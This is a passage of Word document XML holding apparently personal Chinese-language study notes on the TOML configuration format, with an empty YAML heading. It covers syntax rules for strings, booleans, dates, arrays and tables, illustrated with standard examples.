        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F86B092" w14:textId="7BC9D29E" w:rsidR="005435E7" w:rsidRDefault="007E33D4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc159779602"/>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="08A1E9D1" w14:textId="4693B87D" w:rsidR="007E33D4" w:rsidRDefault="007E33D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C196AC7" w14:textId="66222630" w:rsidR="007E33D4" w:rsidRDefault="007E33D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471FEDBB" w14:textId="2EF00729" w:rsidR="007E33D4" w:rsidRDefault="007E33D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494F7CC5" w14:textId="09727959" w:rsidR="007E33D4" w:rsidRDefault="007E33D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A5EE67" w14:textId="77777777" w:rsidR="007E33D4" w:rsidRPr="007E33D4" w:rsidRDefault="007E33D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683597D2" w14:textId="1D3497B6" w:rsidR="004C452C" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc159779603"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007E33D4">
        <w:t>oml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="05ACF364" w14:textId="61521206" w:rsidR="001D2640" w:rsidRPr="001D2640" w:rsidRDefault="001D2640" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2640">
        <w:t>https://www.cnblogs.com/liang1101/p/7600707.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FED719A" w14:textId="3C276720" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc159779604"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规范</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w14:paraId="70DFB7D3" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TOML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="0086499A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>大小写敏感</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A4149" w14:textId="345273D7" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TOML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="0086499A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>必须是UTF8编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03166A90" w14:textId="1C954924" w:rsidR="009D581C" w:rsidRDefault="00F61D5E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403E8492" w14:textId="6691D146" w:rsidR="00516805" w:rsidRDefault="0086499A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标识注释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE2302" w14:textId="77777777" w:rsidR="009D581C" w:rsidRDefault="009D581C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2E25CF" w14:textId="33F4E0E3" w:rsidR="0086499A" w:rsidRDefault="009D581C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54643323" w14:textId="77777777" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BF762F" w14:textId="3B227525" w:rsidR="009D581C" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保留换行的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C98186" w14:textId="77777777" w:rsidR="009D581C" w:rsidRDefault="009D581C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>str1 = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517AC7B2" w14:textId="77777777" w:rsidR="009D581C" w:rsidRDefault="009D581C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Roses are red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B2DA0" w14:textId="6E4BE595" w:rsidR="009D581C" w:rsidRDefault="009D581C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Violets are blue"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EDFB9" w14:textId="63AEB4E9" w:rsidR="0069587A" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB375F">
        <w:t>str2 = "Roses are red\nViolets are blue"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B09013" w14:textId="405F3479" w:rsidR="0069587A" w:rsidRDefault="0069587A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6CDA07" w14:textId="068C8186" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>忽略换行的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48258CBE" w14:textId="77777777" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>key3 = """\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63952FFC" w14:textId="77777777" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       The quick brown \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5EC404" w14:textId="77777777" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       fox jumps over \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6792B5C0" w14:textId="77777777" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       the lazy dog.\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575193EC" w14:textId="025380F6" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D900677" w14:textId="5ED171B1" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240371A3" w14:textId="332B47FE" w:rsidR="00F61D5E" w:rsidRDefault="00F61D5E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整数、浮点数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176150D6" w14:textId="019D101F" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持整数、浮点数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01803987" w14:textId="2F2B8F5E" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3527C547" w14:textId="248494AD" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB53A41" w14:textId="77777777" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bool1 = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0308D747" w14:textId="1688D510" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bool2 = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52854B" w14:textId="77777777" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B3ACC2" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日期时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412D5FD0" w14:textId="7DAD86F4" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RFC 3339</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述的时间格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C191C6" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>date1 = 1979-05-27T07:32:00Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101F8ED" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>date2 = 1979-05-27T00:32:00-07:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30795BDD" w14:textId="13B76515" w:rsidR="00516805" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>date3 = 1979-05-27T00:32:00.999999-07:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017B4FA" w14:textId="1886A946" w:rsidR="00EB375F" w:rsidRDefault="00EB375F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01189CBA" w14:textId="45A42F38" w:rsidR="00EB375F" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A3C07" w14:textId="4742B01C" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组使用方括号包裹。空格会被忽略，包括换行符。元素使用逗号分隔。注意，不允许混用数据类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有的字符串类型均为同一类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BDABB6" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>arr1 = [ 1, 2, 3 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227156C9" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>arr2 = [ "red", "yellow", "green" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B258C" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>arr3 = [ [ 1, 2 ], [3, 4, 5] ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C6578" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>arr4 = [ "all", 'strings', """are the same""", '''type''']   # this is ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D7EF0" w14:textId="77777777" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>arr5 = [ [ 1, 2 ], ["a", "b", "c"] ]    # this is ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA38BAB" w14:textId="5C0BAEED" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>arr6 = [ 1, 2.0 ]         # note: this is NOT ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F963E" w14:textId="424DAB7F" w:rsidR="00C44532" w:rsidRDefault="00C44532" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF52211" w14:textId="5DCBF5FA" w:rsidR="00BE1E60" w:rsidRDefault="00BE1E60" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444FF72" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表格叶称为哈希表或字典，用来存储键值对。表格名由方括号包裹，且自成一行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66085DF3" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A09338D" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[table]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0BA739" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表格名下，直到下一个表格名或文件尾，均为当前表格的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C680A3" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21146A3A" w14:textId="5093CA58" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[table]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C0891" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>key = "value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45215FD1" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bare_key = "value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55305864" w14:textId="427194F8" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bare-key = "value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBCC85" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"127.0.0.1" = "value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1DC23" w14:textId="77777777" w:rsidR="004C1039" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"character encoding" = "value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028EC99" w14:textId="4987120A" w:rsidR="00BE1E60" w:rsidRDefault="004C1039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"ʎǝʞ" = "value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D097E53" w14:textId="77777777" w:rsidR="00BE1E60" w:rsidRDefault="00BE1E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8A01CA" w14:textId="510EDE43" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表格可以嵌套，即表格中某个键的值可以为表格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B735675" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[dog]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8A98F" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>onekey = onevalue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771DB1BB" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49384A85" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[dog.tater]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704020B3" w14:textId="0F8FA643" w:rsidR="00BE1E60" w:rsidRPr="00C44532" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type = "pug"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67335841" w14:textId="77777777" w:rsidR="00BE1E60" w:rsidRDefault="00BE1E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0452B9" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE648F7" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "dog": { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A09B1" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "onekey":"onevalue",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA29C98" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "tater": { "type": "pug" } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E767D" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD9EBD" w14:textId="71F4A29A" w:rsidR="00BE1E60" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F8C6E" w14:textId="77777777" w:rsidR="00BE1E60" w:rsidRDefault="00BE1E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CB34A6" w14:textId="30F1EFE0" w:rsidR="00BE1E60" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持跨越父值写表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904F0D9" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># [x] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D989604" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># [x.y] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BFE17C" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># [x.y.z] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C2AE2" w14:textId="293A1735" w:rsidR="00A0148B" w:rsidRPr="00C44532" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[x.y.z.w] # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF923B" w14:textId="77777777" w:rsidR="00BE1E60" w:rsidRDefault="00BE1E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3489B7AD" w14:textId="42201A8E" w:rsidR="00BE1E60" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
